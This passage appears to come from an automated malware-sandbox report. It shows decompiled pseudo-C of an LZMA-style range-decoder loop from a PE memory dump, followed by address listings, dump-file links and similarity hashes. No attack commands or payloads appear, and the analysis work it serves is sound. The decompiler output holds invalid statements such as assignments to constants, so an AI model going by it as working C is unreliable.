							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x0040647d
0x0040647d
0x00406481
0x00406538
0x0040653b
0x00406547
0x00406428
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00406813
0x00406813
0x00406819
0x00406819
0x00000000
0x004067ee
0x004067ee
0x004067f2
0x004069a1
0x00000000
0x004069a1
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00000000
0x00406810
0x00406487
0x0040648b
0x004069cc
0x004069cc
0x004069cf
0x004069d3
0x004069d3
0x00406491
0x00406497
0x0040649a
0x0040649e
0x004064a1
0x004064a5
0x0040696b
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x00000000
0x004069c8
0x004064ab
0x004064ae
0x004064b4
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x004064df
0x004064df
0x004064df
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x00000000
0x004061be
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x00000000
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x00000000
0x00000000
0x00000000
0x00000000
0x004064ee
0x004064f2
0x004064f9
0x004064fc
0x004064ff
0x00406509
0x00000000
0x00406509
0x004064f4
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x0040652f
0x0040652f
0x00406532
0x00406535
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x00000000
0x0040679a
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00000000
0x0040690d
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x00000000
0x00406762
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
